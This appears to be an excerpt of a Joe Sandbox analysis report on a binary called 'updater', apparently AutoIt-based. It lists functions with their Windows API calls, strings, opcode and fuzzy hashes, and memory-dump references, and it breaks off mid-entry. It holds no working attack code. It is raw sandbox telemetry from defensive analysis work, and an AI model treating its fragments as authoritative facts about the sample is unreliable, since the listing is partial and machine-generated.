Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 09cd8bbd71906db4dfc03d1eed1a56d0314eb3e09c3026d2cbfc8ca11cb3fec7
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 8F019E3204814EBBCF135E84CC01CEE3FA6BB19344B498915FA186C131C376E9B1EB81

Function 0039B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0039B956
ScreenToClient.USER32(?,?), ref: 0039B96E
ScreenToClient.USER32(?,?), ref: 0039B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0039B9AD

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 0ede17ea887a09dc6b2030cd8d99ddfd35deaf7aba30f568ba5ed606dea3aa69
Instruction ID: bce2ec0a3f3a07ac2dcab5a815066becb06c30b82480ddd7ef63ca220d13aef0
Opcode Fuzzy Hash: 0ede17ea887a09dc6b2030cd8d99ddfd35deaf7aba30f568ba5ed606dea3aa69
Instruction Fuzzy Hash: C41143B9D0020AEFDB41CF98D984AEEFBF9FB49314F104156E914E3620D735AA658F90

Function 016D6951 Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(?,?), ref: 016D6962
GetLastError.KERNEL32(?,?), ref: 016D696B
FileTimeToLocalFileTime.KERNEL32(?), ref: 016D6981
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 016D6990

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: FileTime$DateErrorFindLastLocalNext
String ID:
API String ID: 2103556486-0
Opcode ID: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction ID: 3e7dddb45a68a0e48e926834c81078f2f2f25ba5f9303025baf6bf493faa489c
Opcode Fuzzy Hash: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
Instruction Fuzzy Hash: F20119B2E042069FCB04EFA8CCC5DD773ACAB1826070485A6ED16CF24AE630D954CBE5

Function 00377195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 003771A1

Part of subcall function 00377C7F: _memset.LIBCMT ref: 00377CB4

_memmove.LIBCMT ref: 003771C4
_memset.LIBCMT ref: 003771D1
LeaveCriticalSection.KERNEL32(?), ref: 003771E1

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: a8593f0d2338ca031498274a2869ebd91d8cff30004b4839c673c9d8a2db8794
Instruction ID: bb79a56aaebccff73deb2d2afe2e83635dec688e3fa22a81472986808e4376b7
Opcode Fuzzy Hash: a8593f0d2338ca031498274a2869ebd91d8cff30004b4839c673c9d8a2db8794
Instruction Fuzzy Hash: FDF05E7A200100ABCF166F55DCC9B8ABB29EF49320F08C055FE085E22ACB35E911DBB4

Function 0039C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 003116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00311729
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311738
Part of subcall function 003116CF: BeginPath.GDI32(?), ref: 0031174F
Part of subcall function 003116CF: SelectObject.GDI32(?,00000000), ref: 00311778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0039C3E8
LineTo.GDI32(00000000,?,?), ref: 0039C3F5
EndPath.GDI32(00000000), ref: 0039C405
StrokePath.GDI32(00000000), ref: 0039C413

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 96068a9560466cf8c4725d8d10688b87a4a909d4b6b7f15a4e0553896d2da22e
Instruction ID: 66d20a711a93976d37087078952dc210373c27f90bc962e03b080c46a825f5e8
Opcode Fuzzy Hash: 96068a9560466cf8c4725d8d10688b87a4a909d4b6b7f15a4e0553896d2da22e
Instruction Fuzzy Hash: B0F0EC32006218BBDB23AF52AC0EFCF3F5DAF0A310F048001FA11210E283B41660EFA9

Function 0036AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0036AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 0036AA82
GetCurrentThreadId.KERNEL32 ref: 0036AA89
AttachThreadInput.USER32(00000000), ref: 0036AA90

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ae4cb5bafb2f34619c6dba22ddb0aec54586db96084be7a2735c7efa72afb911
Instruction ID: d356f9b5fd6a15ff71e69e4d64140968e4ca95fadec18f9784b4976839128548
Opcode Fuzzy Hash: ae4cb5bafb2f34619c6dba22ddb0aec54586db96084be7a2735c7efa72afb911
Instruction Fuzzy Hash: 7BE0ED31545228BADB265FA2DD0DEEB7F5CEF177A2F008016F50995060C775C550CBE1

Function 003125F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0031260D
SetTextColor.GDI32(?,000000FF), ref: 00312617
SetBkMode.GDI32(?,00000001), ref: 0031262C
GetStockObject.GDI32(00000005), ref: 00312634
GetWindowDC.USER32(?,00000000), ref: 0034C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 0034C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 0034C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 0034C203
GetPixel.GDI32(00000000,?,?), ref: 0034C223
ReleaseDC.USER32(?,00000000), ref: 0034C22E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: bb00e35b143fc4647ce920d19648bad0574f12bc6efab626fa32fbe02f5d1d4a
Instruction ID: e4513d55550797d5e58ed6d95d54bf47fdc1814b7b8d69794a6cfa6d9f1e0ddf
Opcode Fuzzy Hash: bb00e35b143fc4647ce920d19648bad0574f12bc6efab626fa32fbe02f5d1d4a
Instruction Fuzzy Hash: F3E06535504244BBDF6B5F74AC097D83B15EB06331F048366FA69480E187B14590DB11

Function 00369330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00369339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00368F04), ref: 00369340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00368F04), ref: 0036934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00368F04), ref: 00369354

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a688bc1f1e28196a3b5cf4bf2da53db32627bfec50db1c7df011d05f779ff45f
Instruction ID: 47b4bebc46abf6e25241201d481666700225fe18912948706023f2a00ff604aa
Opcode Fuzzy Hash: a688bc1f1e28196a3b5cf4bf2da53db32627bfec50db1c7df011d05f779ff45f
Instruction Fuzzy Hash: B3E0863A601311AFD7665FF15D0DB573B6CFF52791F118818B245C9090E634A444C751

Function 00350679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00350679
GetDC.USER32(00000000), ref: 00350683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003506A3
ReleaseDC.USER32(?), ref: 003506C4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8554d768b93023705c4cae2c72c5b3ac8adb71b87f1416b7326de35c5f3241a8
Instruction ID: b27c8b645d0a96aa11f13805a991101fad87185db65d31435bee7bd37a5a131b
Opcode Fuzzy Hash: 8554d768b93023705c4cae2c72c5b3ac8adb71b87f1416b7326de35c5f3241a8
Instruction Fuzzy Hash: 12E012B1800204EFCF0B9FA0D808AADBBF9EB9D315F11C409FC5AA7220CB3985919F50

Function 0035068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0035068D
GetDC.USER32(00000000), ref: 00350697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 003506A3
ReleaseDC.USER32(?), ref: 003506C4

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1be1b517d09a9145756cf649ba64bc142a7164da7aa6a83f4bf0f9ea956e9c3c
Instruction ID: d5c921fc88914f7a081a543368785e63125c6141f101be9c8be300bb0578bd9f
Opcode Fuzzy Hash: 1be1b517d09a9145756cf649ba64bc142a7164da7aa6a83f4bf0f9ea956e9c3c
Instruction Fuzzy Hash: 2BE012B1800204AFCF0A9FA0D808A9D7BF9EB9D314F108008F95AA7220CB3895918F50

Function 0037B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0032436A: _wcscpy.LIBCMT ref: 0032438D

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

__wcsnicmp.LIBCMT ref: 0037B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0037B739

Strings

LPT, xrefs: 0037B66A

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 07f80b46f3b392ca3ec4b0420a5510d68cfbeb50d8dacb2f75fdd1b9e8905142
Instruction ID: 3f00a0101b6659baa26380d5aba0e5e765dbf958e549010890becd308ddf7f92
Opcode Fuzzy Hash: 07f80b46f3b392ca3ec4b0420a5510d68cfbeb50d8dacb2f75fdd1b9e8905142
Instruction Fuzzy Hash: B9616075A00219EFCB2ADF54C891FAEF7B8EF48710F118059F54AAB291D774AE80CB50

Function 00357190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00357237
_memmove.LIBCMT ref: 00357291

Strings

#V2, xrefs: 0035730B, 0035CAB3, 0035CACF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove
String ID: #V2
API String ID: 4104443479-3783035641
Opcode ID: c2926350772b3d4d68ced1c7eda3a712d07ec9e44f4c972219ebf7d2f402c3a8
Instruction ID: 853a3a8e00d354b03584b8e32eacfdbc05d5259711442685ca5e33c226c8758a
Opcode Fuzzy Hash: c2926350772b3d4d68ced1c7eda3a712d07ec9e44f4c972219ebf7d2f402c3a8
Instruction Fuzzy Hash: DB51A170A00619DFCF26CF68D880AAEBBB5FF44305F10452AEC5AD7250E730E959CB51

Function 0031E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0031E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 0031E037

Strings

@, xrefs: 0031E02B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 13fb18929704cf883f39a5cc257b1c84c0cc7b97d7e1d5edbe5824c0d1a35fdd
Instruction ID: 01df93d7c384f7f3fc355bb0d8514559cc6d6591842bc9cb600266ee5ac501c1
Opcode Fuzzy Hash: 13fb18929704cf883f39a5cc257b1c84c0cc7b97d7e1d5edbe5824c0d1a35fdd
Instruction Fuzzy Hash: 245169B14087449BE321AF14EC85BAFB7FCFB89314F81894CF2D845091DB709468CB16

Function 00398096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00398186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0039819B

Strings

', xrefs: 003980EF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5d50184c3cd53d979f65fc61c955e260a6036f202507dd301a92660839ee5fee
Instruction ID: 05f92ade8b706e1e771f2181c19e7a300366f0ca67980530db9499773d2ca382
Opcode Fuzzy Hash: 5d50184c3cd53d979f65fc61c955e260a6036f202507dd301a92660839ee5fee
Instruction Fuzzy Hash: 89413975A01209AFDF15CF68C881BDA7BB9FF49300F10006AE904EB351DB30A956CF90

Function 00382C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00382C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00382CA0

Strings

|, xrefs: 00382C71

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 3d872c28be7656a446e1036715d6d098b45c869ec4cf973b28c214b3f89ebd5b
Instruction ID: db50f52be38ea5a9e7abc06d5b9959ed6b5d60136d9fcf50aee64df18452af28
Opcode Fuzzy Hash: 3d872c28be7656a446e1036715d6d098b45c869ec4cf973b28c214b3f89ebd5b
Instruction Fuzzy Hash: FD313B75C00219ABCF02EFA0DD85AEFBFB9FF18310F100059F915AA166DB315A56DBA0

Function 00397088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0039713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00397178

Strings

static, xrefs: 003970D8

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 6cca44a65acba610a86c5366e40a3bbdc976d2842908d12f9d5a73e80dd7fdad
Instruction ID: 2decde5b6fa549186c05c6150aca201ea35e35c340d31707af5c07459700af26
Opcode Fuzzy Hash: 6cca44a65acba610a86c5366e40a3bbdc976d2842908d12f9d5a73e80dd7fdad
Instruction Fuzzy Hash: 26319A71110604AAEF169F78DC80AFB77ADFF88720F119619F9A587290DB31AC81CB60

Function 00373049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003730B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003730F3

Strings

0, xrefs: 003730B1

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9d2d11c47483192f0027f2e32bc12a30a64dc85bc9258b440f6e568cae360c75
Instruction ID: 8547ebda1e435164dbc49a6bfb5d3c5d4f17ed0393129e0a5c5adb2ca5a87fa8
Opcode Fuzzy Hash: 9d2d11c47483192f0027f2e32bc12a30a64dc85bc9258b440f6e568cae360c75
Instruction Fuzzy Hash: 1E312B31600305DFEB36EF58C885BEEBBB8EF05340F15C019E889A61A1D7789B44EB51

Function 003840B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00384132

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00384124
, $, xrefs: 00384172

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 9d7f80242f6a4bd90a45ee93db465f99d52d8f79f6f6dfb51ed3aba569c4f8b8
Instruction ID: 35c9798a098485375679e6b53e1c76441efb82f79955d612c7828064fd382783
Opcode Fuzzy Hash: 9d7f80242f6a4bd90a45ee93db465f99d52d8f79f6f6dfb51ed3aba569c4f8b8
Instruction Fuzzy Hash: BC21B130A0022DABCF06EF64D996EEE77B8AF54740F404498F905EB141DB30A985CBA1

Function 016D80B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,016D8197), ref: 016D813F
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,016D8197), ref: 016D8145

Strings

yyyy, xrefs: 016D811A

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 11a67b96f237f7950a717a287ea57c2f12c6da6b3c87527308b911c89f01f6dd
Instruction ID: 3dd35bfd7136a5d53cedc71ba7c849c1c8b15b6936f2498d5139f1553eee5c07
Opcode Fuzzy Hash: 11a67b96f237f7950a717a287ea57c2f12c6da6b3c87527308b911c89f01f6dd
Instruction Fuzzy Hash: 5F218379E0020AABDB01EF68CD95AAEB3BDEF18300F400469E905D7750EA709E05C769

Function 00396CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00396D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00396D91

Strings

Combobox, xrefs: 00396D53

Memory Dump Source

